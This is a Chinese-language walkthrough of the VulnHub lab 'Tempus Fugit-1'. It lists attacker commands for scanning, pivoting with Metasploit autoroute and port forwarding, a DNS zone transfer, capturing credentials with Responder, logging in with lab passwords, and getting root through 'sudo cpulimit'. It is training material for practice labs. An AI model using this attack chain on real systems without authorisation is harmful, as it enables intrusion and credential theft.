环境
虚拟机平台:Oracle VM VirtualBox
攻击机:Kali(IP:192.168.56.102)
靶机:Tempus Fugit-1(IP:192.168.56.115)
下载:https://www.vulnhub.com/entry/tempus-fugit-1,346/
Let’s go
nmap -A 192.168.56.113
只有HTTP服务,让我们浏览网页
进行文件上传
尝试多种方式无果,Google后知道文件名存在命令注入
应该是在docker中,我们进行反弹shell
这里需要将IP地址转换,因为(.)被过滤了
python -c "import pty; pty.spawn('/bin/bash')"
cat main.py
netstat -pantu
ping -c 3 ftp.mofo.pwn
ls /usr/bin | grep ftp
lftp someuser@172.19.0.12
password:b232a4da4c104798be4613ab76d26efda1a04606
cat cmscreds.txt
需要检查一遍内网,用 metasploit 做一下路由
ifconfig
run autoroute -s 172.19.0.0/16
arp
use auxiliary/scanner/portscan/tcp
show options
set rhosts 172.19.0.1 172.19.0.12 172.19.0.100
run
进行端口转发
portfwd add -l 8080 -r 172.19.0.1 -p 8080
并没有发现CMS,怀疑需要域名解析,因为存在DNS服务器
apk add bind-tools
cat /etc/resolv.conf
dig axfr mofo.pwn
找到登录页面,使用上面得到的信息登录
发现可以编辑PHP反弹shell
虽然拿到了shell,但是陷入了困境,Google后知道需要用到 Responder
responder -I eth0
su kattie
password:sebastian
python -c "import pty; pty.spawn('/bin/bash')"
ls /var/mail
cat /var/mail/kattie
su josefa
password:9l4lw0r82fl1
sudo -l
sudo cpulimit -l 100 -f /bin/sh